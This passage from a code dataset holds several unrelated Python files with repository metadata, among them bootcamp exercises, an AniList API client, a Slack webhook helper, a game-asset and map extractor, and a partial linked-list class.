(len(some_list)):\n print(some_list[i])\n\niterateDictionary(students)\n\n# 3\n# def iterateDictionary2(key_name, some_list):\n# for i in range( len(some_list)):\n# if key_name == \"first_name\":\n# print(some_list[i][\"first_name\"])\n# elif key_name == \"last_name\":\n# print(some_list[i][\"last_name\"])\n\n# iterateDictionary2(\"first_name\", students)\n# iterateDictionary2(\"last_name\", students)\n\ndef iterateDictionary2(key_name, some_list):\n for i in range( len(some_list)):\n print(some_list[i][key_name])\niterateDictionary2(\"first_name\", students)\niterateDictionary2(\"last_name\", students)\n\n# 4\n\ndojo = {\n 'locations': ['San Jose', 'Seattle', 'Dallas', 'Chicago', 'Tulsa', 'DC', 'Burbank'],\n 'instructors': ['Michael', 'Amy', 'Eduardo', 'Josh', 'Graham', 'Patrick', 'Minh', 'Devon']\n}\n\ndef printInfo(some_dict):\n for i in range (len(some_dict)):\n if (i % 2 == 0):\n num = len(some_dict[some_dict.keys()[i + 1]])\n nums = str(num)\n print(nums +\" \"+ some_dict.keys()[i + 1].upper())\n for j in range(len(some_dict[some_dict.keys()[0 +1]])):\n print ( some_dict[some_dict.keys()[i +1]][j])\n elif (i % 2 != 0):\n num = len(some_dict[some_dict.keys()[i - 1]])\n nums = str(num)\n print(nums +\" \"+ some_dict.keys()[i - 1].upper())\n for y in range (len(some_dict[some_dict.keys()[1 - 1]])):\n print (some_dict[some_dict.keys()[i - 1]][y])\n\nprintInfo(dojo)","repo_name":"Itserge1/Coding_Dojo_Python","sub_path":"Core_assigment/functions_intermediat/functions_intermediate_i.py","file_name":"functions_intermediate_i.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72590116643","text":"import time\n\nfrom Initializers.RandomInitializer import RandomInitializer\nfrom Logging.FileLogger import FileLogger\nfrom Optimizers.RandomWalk import RandomWalk\nfrom Problems.Sphere import Sphere\n\nif __name__ == \"__main__\":\n dimensions = 2\n iterations = 10000\n problem = Sphere(dimensions)\n logger = FileLogger(iterations, iterations, 0, \"random_walk_fitness.csv\")\n initializer = RandomInitializer(dimensions)\n\n start = time.time()\n optimizer = RandomWalk(problem, logger, initializer)\n print(f'Starting Best Fitness: {optimizer.bestFitness}')\n for i in range(iterations):\n optimizer.optimize()\n end = time.time()\n\n print(f'Best Fitness Found: {optimizer.bestFitness}')\n print(f'Elapsed Time: {end - start}')","repo_name":"firestrand/pyOptimize","sub_path":"BenchmarkOptimization.py","file_name":"BenchmarkOptimization.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"221848447","text":"import requests\nimport json\nimport nflpool.data.secret as secret\n\n\nclass SlackService:\n @staticmethod\n def send_message(message_string):\n \"\"\"\n Set the webhook_url to the one provided by Slack when you create the webhook\n at https://my.slack.com/services/new/incoming-webhook/\n \"\"\"\n\n slack_webhook_url = secret.slack_webhook_url\n slack_data = {\"text\": message_string}\n\n response = requests.post(\n slack_webhook_url,\n data=json.dumps(slack_data),\n headers={\"Content-Type\": \"application/json\"},\n )\n if response.status_code != 200:\n raise ValueError(\n \"Request to slack returned an error %s, the response is:\\n%s\"\n % (response.status_code, response.text)\n )\n","repo_name":"prcutler/nflpool","sub_path":"nflpool/services/slack_service.py","file_name":"slack_service.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"24875254602","text":"# Preprocess user data\n# Convert tabs into pipes\n# Turn timestamps from ms since epoch into a string that C* will like\n\nfrom datetime import datetime\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-t', '--timestamp-token', type=int, default=None,\n help='Index of field containing timestamp')\n\nargs = parser.parse_args()\n\nfor line in sys.stdin:\n toks = line.split('\\t')\n\n if args.timestamp_token != None:\n\n dt = datetime.fromtimestamp(int(toks[args.timestamp_token]))\n toks[args.timestamp_token] = dt.strftime('%Y-%m-%d %H:%M:%S')\n\n print('|'.join(toks))\n","repo_name":"wibiclint/moviegenie","sub_path":"scripts/pp.py","file_name":"pp.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"3856191777","text":"import logging\n\nlogger_anilist = logging.getLogger(__name__)\nlogger_anilist.addHandler(logging.NullHandler())\n\nfrom anime import network\nfrom anime.enums import Lang\n\n\nendpoint = 'https://graphql.anilist.co'\ncheck_login = \"\"\"\n query {\n Viewer {\n id\n name\n }\n }\"\"\"\nquery_anime = \"\"\"\n query($page: Int, $search: String, $id: Int, $ids: [Int]) {\n Page(page: $page, perPage: 50) {\n pageInfo {\n hasNextPage\n }\n media(search: $search, id: $id, id_in: $ids, type: ANIME) {\n id\n title {\n romaji\n english\n native\n }\n synonyms\n bannerImage\n coverImage {\n extraLarge\n }\n nextAiringEpisode {\n episode\n airingAt\n }\n }\n }\n }\n \"\"\"\nquery_current = \"\"\"\n query($uid: Int) {\n MediaListCollection(userId: $uid, status: CURRENT, type: ANIME) {\n lists {\n name\n isCustomList\n isSplitCompletedList\n status\n entries {\n media {\n id\n status\n title {\n romaji\n english\n native\n userPreferred\n }\n synonyms\n bannerImage\n coverImage {\n extraLarge\n }\n nextAiringEpisode {\n episode\n airingAt\n }\n }\n }\n }\n }\n }\n \"\"\"\nquery_anime_entries = \"\"\"\n query($page: Int, $uid: Int, $id: Int, $ids: [Int]) {\n Page(page: $page, perPage: 50) {\n pageInfo {\n hasNextPage\n }\n mediaList(userId: $uid, mediaId: $id, mediaId_in: $ids, type: ANIME) {\n id\n mediaId\n status\n customLists\n }\n }\n }\"\"\"\nmutate_anime_entry = \"\"\"\n mutation($id: Int, $mediaId: Int, $status: MediaListStatus, $customLists: [String]) {\n SaveMediaListEntry(id: $id, mediaId: $mediaId, status: $status, customLists: $customLists) {\n id\n mediaId\n customLists\n }\n }\"\"\"\n\n\ndef ask(msg, choices, index=False, show=False, default=None, limit=0, none=False):\n while True:\n print(msg)\n if show:\n for i in range(len(choices)):\n if limit != 0 and i != 0 and i % limit == 0:\n ans = input('>')\n if ans != '':\n if ans in choices:\n if index:\n return choices.index(ans)\n else:\n return ans\n ans = int(ans) - 1\n if -1 < ans < i:\n if index:\n return ans\n else:\n return choices[ans]\n print(msg)\n print(f'{i + 1}) {choices[i]}')\n if none:\n print(f'{i + 2}) None')\n ans = input('>')\n if ans == '' and show:\n return default\n if ans in choices:\n if index:\n return choices.index(ans)\n else:\n return ans\n\n if show:\n ans = int(ans) - 1\n if ans == len(choices) and none:\n return None\n elif -1 < ans < len(choices):\n if index:\n return ans\n else:\n return choices[ans]\n\n\ndef check_api_limit(limit, perTime):\n from time import sleep\n count = 0\n while True:\n if count == limit:\n logger_anilist.info('API limit reached. Waiting for %d seconds...', perTime)\n sleep(perTime)\n count = 0\n logger_anilist.info('Finished Waiting.')\n count += 1\n yield count\n\n\nAPI_limit = check_api_limit(limit=90, perTime=65)\nheaders = None\nuser = 'None'\n\n\ndef request(query, variables=None):\n next(API_limit)\n response = network.request(endpoint, headers=headers, json={'query': query, 'variables': variables})\n if \"errors\" in response.keys():\n for err in response[\"errors\"]:\n logger_anilist.error('API response NOT OK! Status code = %d \"%s\" %s', err[\"status\"], err[\"message\"], str(err['locations'][0]))\n return None\n logger_anilist.debug('API response OK!')\n return response[\"data\"]\n\n\ndef get_auth():\n network.open('https://anilist.co/api/v2/oauth/authorize?client_id=14129&response_type=token')\n\n\ndef set_auth(auth):\n global headers, user\n tmp = headers\n headers = {'Authorization': 'Bearer ' + auth,\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'}\n result = request(check_login)\n if result is None:\n headers = tmp\n return False\n user = result['Viewer']['id']\n return True\n\n\ndef is_authorized():\n return headers is not None\n\n\ndef get_current_anime(uid='None', dump=False):\n if uid == 'None':\n uid = user\n variables = {'uid': uid}\n next(API_limit)\n response = request(query_current, variables)\n response = response['MediaListCollection']['lists'][0]['entries']\n medias = [entry['media'] for entry in response if entry['media']['status'] == 'RELEASING']\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(medias, f, ensure_ascii=False)\n return medias\n\n\ndef get_anime(search=None, ids=None, auto=True, lang=Lang.NATIVE, dump=False):\n page = 1\n variables = {'page': page}\n if ids is not None:\n if isinstance(ids, int):\n variables['id'] = ids\n\n response = request(query_anime, variables)\n media = response[\"Page\"][\"media\"][0]\n else:\n variables['ids'] = ids\n\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media = response[\"Page\"][\"media\"]\n while hasNextPage:\n page += 1\n variables['page'] = page\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media.extend(response[\"Page\"][\"media\"])\n elif search is not None:\n variables['search'] = search\n\n response = request(query_anime, variables)\n if auto:\n media = response[\"Page\"][\"media\"][0]\n else:\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n medias = response[\"Page\"][\"media\"]\n mediass = []\n ans = ask(search + ' :', [media['title'][str(lang)] for media in medias], index=True, show=True, limit=10)\n while ans is None:\n if hasNextPage:\n mediass.append(medias)\n page += 1\n variables['page'] = page\n response = request(query_anime, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n medias = response[\"Page\"][\"media\"]\n ans = ask(search + ' :', [media['title'][str(lang)] for media in medias], index=True, show=True, limit=10)\n else:\n if len(medias) != 0:\n mediass.append(medias)\n medias = []\n ans = ask(search + ' :', [media['title'][str(lang)] for medias in mediass for media in medias], index=True, show=True, limit=10)\n # when last page is reached this becomes true\n # len(mediass) = page - 1 except for the last page\n if page > len(mediass):\n media = medias[ans]\n else:\n media = mediass[int(ans / len(mediass[0]))][ans % len(mediass[0])]\n\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(media, f, ensure_ascii=False)\n return media\n\n\ndef get_anime_entires(ids, uid='None', dump=False):\n if uid == 'None':\n uid = user\n page = 1\n variables = {'page': page, 'uid': uid}\n if isinstance(ids, int):\n variables['id'] = ids\n\n response = request(query_anime_entries, variables)\n media = response[\"Page\"][\"mediaList\"][0]\n else:\n variables['ids'] = ids\n\n response = request(query_anime_entries, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media = response[\"Page\"][\"mediaList\"]\n while hasNextPage:\n page += 1\n variables['page'] = page\n response = request(query_anime_entries, variables)\n hasNextPage = response[\"Page\"][\"pageInfo\"][\"hasNextPage\"]\n media.extend(response[\"Page\"][\"mediaList\"])\n\n if dump:\n import json\n with open('response.json', 'w', encoding='utf-8') as f:\n json.dump(media, f, ensure_ascii=False)\n return media\n\n\ndef add_anime_to_customlists(id, customlists, is_mediaId=False):\n if is_mediaId:\n variables = {'mediaId': id, 'status': 'PLANNING', 'customLists': customlists}\n else:\n variables = {'id': id, 'customLists': customlists}\n result = request(mutate_anime_entry, variables)\n if result is None:\n return False\n else:\n return True\n","repo_name":"Omar-Abdul-Azeez/anime_manager","sub_path":"anime/anilist_api.py","file_name":"anilist_api.py","file_ext":"py","file_size_in_byte":10424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37772115281","text":"# import __main__ as main\n# from Helper.TimerLogger import CodeTimeLogging\n# fileName = main.__file__\n# fileName = fileName.split('\\\\')[-1]\n\n# CodeTimeLogging(Flag='F', filename=fileName, Tag='Array', Difficult='Medium')\n\n\ndef findPartten(nums):\n n = len(nums)\n if n < 3:\n return False\n stack = []\n right = float('-inf')\n for i in reversed(range(n)):\n if nums[i] < right:\n return True\n else:\n while stack and nums[i] > stack[-1]:\n right = stack.pop()\n stack.append(nums[i])\n return False\n\n\nnums = [1, 2, 3, 4]\nprint(findPartten(nums))\n","repo_name":"Omkar02/FAANG","sub_path":"AZ_LC_456_132_pattern.py","file_name":"AZ_LC_456_132_pattern.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26079427654","text":"import os\nimport png\nimport struct\nimport math\nimport glob\nimport json\n\ndef run():\n\tmaps = dict([parse_map(pam_file) for pam_file in glob.glob(\"./input/MAPS/*.PAM\")])\n\tprint(json.dumps(maps))\n\t# parse_file('./input/COLONIES/LGCOL1.CMP', './out/images/test.png', 32)\n\t# parse_file('./input/SIMG/ALIE_SI.ICA', './out/images/structures/alie_si.png', 32)\n\t# parse_file('./input/SIMG/ALIE_SSI.ICA', './out/images/structures/alie_ssi.png', 32)\n\t# parse_file('./input/UIMG/ALIE_SUI.ICA', './out/images/units/alie_sui.png', 32)\n\t# parse_file('./input/UIMG/ALIE_UI.ICA', './out/images/units/alie_ui.png', 32)\n\t# parse_file('./input/ANMS/CAT.ANM', './out/images/anim/cat.png')\n\t# parse_file('./input/TIMG/DESERT.ICA', './out/images/terrain/desert.png', 50)\n\t# parse_file('./input/ANMS/DGS.ANM', './out/images/anim/dgs.png')\n\t# parse_file('./input/ANMS/DMP.ANM', './out/images/anim/dmp.png')\n\t# parse_file('./input/ANMS/DMS.ANM', './out/images/anim/dms.png')\n\t# parse_file('./input/ANMS/DPS.ANM', './out/images/anim/dps.png')\n\t# parse_file('./input/TIMG/FOREST.ICA', './out/images/terrain/forest.png', 50)\n\t# parse_file('./input/SIMG/HUMA_SI.ICA', './out/images/structures/huma_si.png', 32)\n\t# parse_file('./input/SIMG/HUMA_SSI.ICA', './out/images/structures/huma_ssi.png', 32)\n\t# parse_file('./input/UIMG/HUMA_SUI.ICA', './out/images/units/huma_sui.png', 32)\n\t# parse_file('./input/UIMG/HUMA_UI.ICA', './out/images/units/huma_ui.png', 32)\n\t# parse_file('./input/ANMS/IMP.ANM', './out/images/anim/imp.png')\n\t# parse_file('./input/ANMS/IMPMEG.ANM', './out/images/anim/impmeg.png')\n\t# parse_file('./input/ANMS/IMPMISS.ANM', './out/images/anim/impmiss.png')\n\t# parse_file('./input/ANMS/KRY.ANM', './out/images/anim/kry.png')\n\t# parse_file('./input/ANMS/MMP.ANM', './out/images/anim/mmp.png')\n\t# parse_file('./input/SIMG/NEUT_SI.ICA', './out/images/structures/neut_si.png', 32)\n\t# parse_file('./input/SIMG/NEUT_SSI.ICA', './out/images/structures/neut_ssi.png', 32)\n\t# parse_file('./input/UIMG/NEUT_SUI.ICA', './out/images/units/neut_sui.png', 32)\n\t# parse_file('./input/UIMG/NEUT_UI.ICA', './out/images/units/neut_ui.png', 32)\n\t# parse_file('./input/ANMS/NUKE.ANM', './out/images/anim/nuke.png')\n\t# parse_file('./input/ANMS/POW.ANM', './out/images/anim/pow.png')\n\t# parse_file('./input/ANMS/RAD.ANM', './out/images/anim/rad.png')\n\t# parse_file('./input/ROADS/ROADS.ICA', './out/images/structures/infra.png', 17)\n\t# parse_file('./input/TIMG/ROCKY.ICA', './out/images/terrain/rocky.png', 50)\n\t# parse_file('./input/ANMS/SBI.ANM', './out/images/anim/sbi.png')\n\t# parse_file('./input/ANMS/X1B.ANM', './out/images/anim/x1b.png')\n\t# parse_file('./input/ANMS/X1S.ANM', './out/images/anim/x1s.png')\n\t# parse_file('./input/ANMS/XAS.ANM', './out/images/anim/xas.png')\n\t# parse_file('./input/ANMS/XHS.ANM', './out/images/anim/xhs.png')\n\ndef parse_map(input_name):\n\n\tterrains = ['desert', 'forest', 'rocky']\n\n\ttouching_lookup = {\n\t\t\"aberdeen\": [\"rock-castle\",\"sparta\",\"marshall\",\"roanoke\",\"creedmoor\",\"garland\"],\n\t\t\"alma\": [\"bromont\",\"granby\",\"brome-lake\"],\n\t\t\"ayden\": [\"rock-castle\",\"high-point\",\"eagle-nest\",\"snake-river\",\"canuck\"],\n\t\t\"brimstone\": [\"norenda\",\"thetfordmines\"],\n\t\t\"brome-lake\": [\"granby\",\"alma\",\"hull\",\"norenda\"],\n\t\t\"bromont\": [\"lachine\",\"sutton\",\"rawdon\",\"granby\",\"alma\"],\n\t\t\"canuck\": [\"ayden\",\"snake-river\",\"point-harbour\"],\n\t\t\"cartasone\": [\"haven\",\"eagle-nest\",\"high-point\",\"milos\"],\n\t\t\"chaos\": [\"garland\",\"creedmoor\"],\n\t\t\"chertsy\": [\"rolland\",\"sutton\",\"rawdon\",\"masson-lake\"],\n\t\t\"creedmoor\": [\"roanoke\",\"aberdeen\",\"garland\",\"chaos\"],\n\t\t\"delos\": [\"sparta\",\"marshall\",\"kinabal\",\"norwood\"],\n\t\t\"eagle-nest\": [\"haven\",\"cartasone\",\"high-point\",\"ayden\",\"snake-river\"],\n\t\t\"elkin\": [\"sparta\", \"milos\"],\n\t\t\"esterel\": [\"kamouraska\",\"orford\",\"valleyfield\"],\n\t\t\"free-city\": [\"lachine\",\"sutton\",\"rolland\"],\n\t\t\"garland\": [\"aberdeen\",\"creedmoor\",\"chaos\"],\n\t\t\"granby\": [\"rawdon\",\"bromont\",\"alma\",\"brome-lake\"],\n\t\t\"haven\": [\"cartasone\",\"eagle-nest\"],\n\t\t\"high-point\": [\"rock-castle\",\"ayden\",\"eagle-nest\",\"cartasone\",\"milos\",\"sparta\"],\n\t\t\"hull\": [\"brome-lake\",\"norenda\",\"thetfordmines\",\"sherbrooke\"],\n\t\t\"kamouraska\": [\"esterel\",\"orford\",\"three-rivers\",\"sherbrooke\"],\n\t\t\"kinabal\": [\"norwood\",\"delos\",\"marshall\"],\n\t\t\"lachine\": [\"free-city\",\"sutton\",\"bromont\"],\n\t\t\"marshall\": [\"kinabal\",\"delos\",\"sparta\",\"aberdeen\",\"roanoke\"],\n\t\t\"masson-lake\": [\"chertsy\",\"sherbrooke\"],\n\t\t\"milos\": [\"cartasone\",\"high-point\",\"sparta\",\"elkin\"],\n\t\t\"norenda\": [\"brome-lake\",\"hull\",\"thetfordmines\",\"brimstone\"],\n\t\t\"norwood\": [\"kinabal\",\"delos\"],\n\t\t\"orford\": [\"esterel\",\"valleyfield\",\"three-rivers\",\"kamouraska\"],\n\t\t\"point-harbour\": [\"snake-river\",\"canuck\"],\n\t\t\"rawdon\": [\"chertsy\",\"sutton\",\"bromont\",\"granby\"],\n\t\t\"roanoke\": [\"marshall\",\"aberdeen\",\"creedmoor\"],\n\t\t\"rock-castle\": [\"aberdeen\",\"sparta\",\"high-point\",\"ayden\"],\n\t\t\"rolland\": [\"free-city\",\"sutton\",\"chertsy\"],\n\t\t\"sherbrooke\": [\"masson-lake\",\"hull\",\"thetfordmines\",\"three-rivers\",\"kamouraska\"],\n\t\t\"snake-river\": [\"eagle-nest\",\"ayden\",\"canuck\",\"point-harbour\"],\n\t\t\"sparta\": [\"elkin\",\"milos\",\"high-point\",\"rock-castle\",\"aberdeen\",\"marshall\",\"delos\"],\n\t\t\"sutton\": [\"free-city\",\"rolland\",\"chertsy\",\"rawdon\",\"bromont\",\"lachine\"],\n\t\t\"thetfordmines\": [\"three-rivers\",\"sherbrooke\",\"hull\",\"norenda\",\"brimstone\"],\n\t\t\"three-rivers\": [\"valleyfield\",\"orford\",\"kamouraska\",\"sherbrooke\",\"thetfordmines\"],\n\t\t\"valleyfield\": [\"esterel\",\"orford\",\"three-rivers\"],\n\t\t\"waterloo\": [],\n\t\t\"balkany\": []\n\t}\n\n\t# used for temporarily calculating the terrain types\n\t# terrain_kinds = ['Void', 'Plain','Forest','Water','Mountain','Bridge','Rock']\n\n\twith open(input_name, 'rb') as pam:\n\t\t# 4 byte marker\n\t\t_ = struct.unpack('4s8x', pam.read(12))\n\t\tname, _, _ = [x.decode('ascii').replace('\\00', '') for x in struct.unpack('24s24s24s', pam.read(24*3))]\n\t\tkey = name.replace(' ', '-').lower()\n\n\t\t# exceptions\n\t\tif key == \"sutton-lake\":\n\t\t\tkey = \"sutton\"\n\t\t\tname = \"Sutton\"\n\t\tif key == \"brome-city\":\n\t\t\tkey = \"brome-lake\"\n\t\t\tname = \"Brome Lake\"\n\n\t\tterrain = terrains[struct.unpack('q', pam.read(8))[0]]\n\t\tenergy, credits, research = struct.unpack('bbbx', pam.read(4))\n\t\t# discard the next 6112 - not sure what they are used for - they all start with NEUTRAL and some have a magic number\n\t\t# somewhere in it :/\n\t\t_ = pam.read(6112)\n\t\twidth, height = struct.unpack('ii', pam.read(8)) # all maps are 48x48\n\n\t\ttiles = [[struct.unpack('BxxB12x', pam.read(16))[0] for row in range(height)] for column in range(width)]\n\n\t\treturn (key, {\n\t\t\t \"width\": width,\n\t\t\t\t\t\"height\": height,\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"type\": terrain,\n\t\t\t\t\t\"energy\": int(energy),\n\t\t\t\t\t\"credits\": int(credits),\n\t\t\t\t\t\"research\": int(research),\n\t\t\t\t\t\"touching\": touching_lookup[key],\n\t\t\t\t\t\"tiles\": tiles\n\t\t})\n\n\ndef parse_file(input_name, output_name, row_tile_count=1):\n\tpalette = []\n\tall_imgs = []\n\n\twith open(input_name, 'rb') as ica:\n\t\t# 8 byte Magic CImageF\n\t\tmagic = struct.unpack('8s', ica.read(8))[0].decode('ascii').replace('\\00', '')\n\t\t# number of tiles - 2 byte little-endian\n\t\tnumber_of_tiles = struct.unpack('<h', ica.read(2))[0]\n\t\tprint(\"File has \" + str(number_of_tiles) + \" tiles\")\n\n\t\t# read 4 bytes for each colour in the palette\n\t\tfor i in range(0, 256):\n\t\t\tcolor = struct.unpack('4B', ica.read(4))[::-1][1:]\n\t\t\tpalette.append(color)\n\n\t\tmax_width = 0\n\t\tmax_height = 0\n\t\tfor i in range(0, number_of_tiles):\n\t\t\t# 10 bytes for the object id\n\t\t\ttile_id = struct.unpack('4s6s', ica.read(10))[1].decode('ascii').replace('\\00', ' ')\n\n\t\t\ttile_len = struct.unpack('3h', ica.read(6))[1]\n\t\t\theight, width = struct.unpack('2h', ica.read(4))\n\n\t\t\tprint(\"read object \" + tile_id + \" w:\"+str(width)+\" h:\"+str(height)+\" tiles: \"+str(tile_len))\n\n\t\t\tpixel_data = decompress(ica, tile_len, width, height)\n\t\t\timg = []\n\t\t\tfor row in range(0, len(pixel_data)):\n\t\t\t\timg_row = []\n\t\t\t\timg.append(img_row)\n\t\t\t\tfor pixel in pixel_data[row]:\n\t\t\t\t\treal_colour = palette[pixel]\n\t\t\t\t\timg_row.extend(real_colour)\n\n\t\t\tall_imgs.append(img)\n\t\t\tmax_width = max(max_width, width)\n\t\t\tmax_height = max(max_height, height)\n\n\t\t# some X1B.ANM contain tiles of different sizes and require transparent padding to the right and bottom\n\t\tspritesheet = []\n\t\tprint(\"len(all_imgs) = \" + str(len(all_imgs)) + \" where number_of_tiles = \" + str(number_of_tiles) + \"\")\n\n\t\ttransparent_colour = palette[0]\n\n\t\t# for each tile, ensure it's exactly max_width and max_height\n\t\tfor img in all_imgs:\n\t\t\tfor row in img:\n\t\t\t\t# add transparent padding/columns to the right\n\t\t\t\trow.extend((max_width - int(len(row) / 3)) * transparent_colour)\n\t\t\t# add transparent padding/rows at the bottom\n\t\t\tfor i in range(0, max_height - len(img)):\n\t\t\t\timg.append(max_width * transparent_colour)\n\n\t\t# Add each tile image to the spritesheet\n\t\ttarget_tile_count_row = row_tile_count # how many tiles we display on each row\n\t\tfor idx, img in enumerate(all_imgs):\n\t\t\ttarget_row = math.floor(idx/target_tile_count_row)\n\t\t\tfor row_idx, row in enumerate(img):\n\t\t\t\ttarget_row_idx = (target_row * max_height) + row_idx\n\t\t\t\tif target_row_idx + 1 > len(spritesheet):\n\t\t\t\t\tspritesheet.append([])\n\t\t\t\tspritesheet[target_row_idx].extend(row)\n\n\t\t# Ensure that the very last row is the same width as the others by extending with transparent pixels\n\t\t# [ \n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3 ]\n\t\t# ]\n\t\t# becomes\n\t\t# [ \n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 4, 5 ]\n\t\t# [ 1, 2, 3, 0, 0 ]\n\t\t# ]\n\t\tspritesheet_width = len(spritesheet[0])\n\t\tfor row in spritesheet:\n\t\t\tcount = spritesheet_width - len(row)\n\t\t\tif count == 0: continue\n\t\t\tadditional = [colour for pixel in [transparent_colour] for colour in pixel] * int(count / len(transparent_colour))\n\t\t\trow.extend(additional)\n\n\t\tout_dir = os.path.dirname(output_name)\n\t\tif not os.path.exists(out_dir):\n\t\t\tos.makedirs(out_dir)\n\n\t\twith open(output_name, 'wb') as output:\n\t\t\tw = png.Writer(int(spritesheet_width / 3), len(spritesheet), transparent=transparent_colour)\n\t\t\tw.write(output, spritesheet)\n\n\ndef decompress(data, length, width, height):\n\tall_rows = []\n\n\t# read the number of bytes for this tile\n\tbytes_on_line = struct.unpack(\"B\", data.read(1))[0]\n\ttotal_read = 1\n\n\t# while we have lines to read\n\touter_loop = 0\n\trunning = True\n\twhile running:\n\t\t# read 3 bytes of padding\n\t\tpadding = data.read(3)\n\t\ttotal_read += 3\n\t\tprint(\"padding = \" + str(padding))\n\t\tcurrent_row = []\n\t\tall_rows.append(current_row)\n\n\t\t# while we have instructions to read on this line\n\t\tline_bytes_read = 3\n\t\tinner_loop = 0\n\t\twhile line_bytes_read < bytes_on_line - 1:\n\t\t\t# read instruction\n\t\t\tcurrent_instruction = data.read(4)\n\t\t\ttotal_read += 4\n\t\t\tline_bytes_read += 4\n\t\t\tnum_pixels, pixel_colour, drawing_mode = struct.unpack(\"BBH\", current_instruction)\n\t\t\tprint(\"instruction = \" + str(current_instruction) + \" outer:\" + str(outer_loop) + \", inner:\" + str(inner_loop))\n\t\t\tprint(\"scan_data :: num_pixels = \" + str(num_pixels) + \" pixel_colour = \" + str(pixel_colour) + \" drawing_mode:\" + str(drawing_mode))\n\n\t\t\tif drawing_mode == 1:\n\t\t\t\tprint(\"drawing compressed pixels \" + str(num_pixels) + \" of colour \" + str(pixel_colour))\n\t\t\t\tcurrent_row.extend(num_pixels * [pixel_colour])\n\t\t\telif drawing_mode == 2:\n\t\t\t\tpixels = data.read(num_pixels)\n\t\t\t\ttotal_read += num_pixels\n\t\t\t\tline_bytes_read += num_pixels\n\t\t\t\tcurrent_row.extend(pixels)\n\t\t\t\tprint(\"drawing \" + str(num_pixels) + \" uncompressed pixels \" + str(pixels))\n\n\t\t\tinner_loop += 1\n\t\t\tprint(\"end of inner loop: line_bytes_read = \" + str(line_bytes_read) + \", bytes_on_line = \" + str(bytes_on_line))\n\n\t\tif len(current_row) < width:\n\t\t\tx = width - len(current_row)\n\t\t\tprint(\"adding \" + str(x) + \" more to \" + str(len(current_row)))\n\t\t\tcurrent_row.extend(x * [0])\n\t\tif len(current_row) > width:\n\t\t\tdel current_row[width:]\n\t\t\tprint(\"removing new len = \" + str(len(current_row)))\n\t\tprint(\"produced = \" + str(current_row))\n\n\t\tbytes_on_line = struct.unpack(\"B\", data.read(1))[0]\n\t\ttotal_read += 1\n\t\tline_bytes_read += 1\n\t\tif total_read + bytes_on_line > length:\n\t\t\tprint(\"warning 1 @ \" + str(data.tell()) + \" :: \" + str(total_read) + \" + \" + str(bytes_on_line) + \" > \" + str(length) + \" truncating to only read \" + str(length - total_read))\n\t\t\tbytes_on_line = length - total_read\n\n\t\tif bytes_on_line == 0 and total_read < length:\n\t\t\tprint(\"warning 2 @ \" + str(data.tell()) + \" :: was going to read 0 but we have \" + str(length - total_read) + \" left to read. Reading it...\")\n\t\t\tbytes_on_line = length - total_read\n\n\t\tprint(\"Finished reading line, moving to next, which is \" + str(bytes_on_line) + \", read = \" + str(total_read) + \", total = \" + str(length))\n\t\touter_loop += 1\n\n\t\tif total_read >= length:\n\t\t\tprint(\"ending \" + str(total_read) + \" >= \" + str(length))\n\t\t\trunning = False\n\n\twhile len(all_rows) < height:\n\t\tall_rows.append(width * [0])\n\n\tprint(\"Finished reading tile \" + str(len(all_rows)) + \", read \" + str(total_read) + \"/\" + str(length))\n\tall_rows.reverse()\n\treturn all_rows\n","repo_name":"jasoncabot/fallen","sub_path":"extractor/extractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12746,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"25328309714","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 18 21:11:53 2018\r\n\r\n@author: ljc\r\n\"\"\"\r\n\r\nclass Node(object):\r\n def __init__(self,data,pnext=None,ppre = None):\r\n self._next = pnext\r\n self._prev = ppre\r\n self.data = data\r\n def __repr__(self):\r\n return str(self.data)\r\nclass linked_list(object):\r\n def __init__(self):\r\n self.head=None\r\n self.length = 0\r\n def __str__(self):\r\n str_init = ''\r\n if not self.isEmpty():\r\n node = self.head\r\n while node._next:\r\n str_init += str(node.data)\r\n str_init += '-->'\r\n node = node._next\r\n str_init += str(node.data)\r\n return str_init\r\n def isEmpty(self):\r\n return self.length ==0\r\n def append(self,dataOrnode):\r\n item = None\r\n if isinstance(dataOrnode,Node):\r\n item = dataOrnode\r\n else:\r\n item = Node(dataOrnode)\r\n \r\n if not self.head:\r\n self.head = item\r\n self.length+=1\r\n else:\r\n node = self.head\r\n while node._next:\r\n node = node._next\r\n node._next = item\r\n self.length +=1 \r\n \r\n def insert(self,dataOrnode,index=0):\r\n if self.isEmpty():\r\n print('Linked list is already empty now initialize')\r\n self.__init__()\r\n if index>self.length or index<0:\r\n print('index error')\r\n else:\r\n item = None\r\n if isinstance(dataOrnode,Node):\r\n item = dataOrnode\r\n else:\r\n item = Node(dataOrnode)\r\n if index == 0:\r\n head = 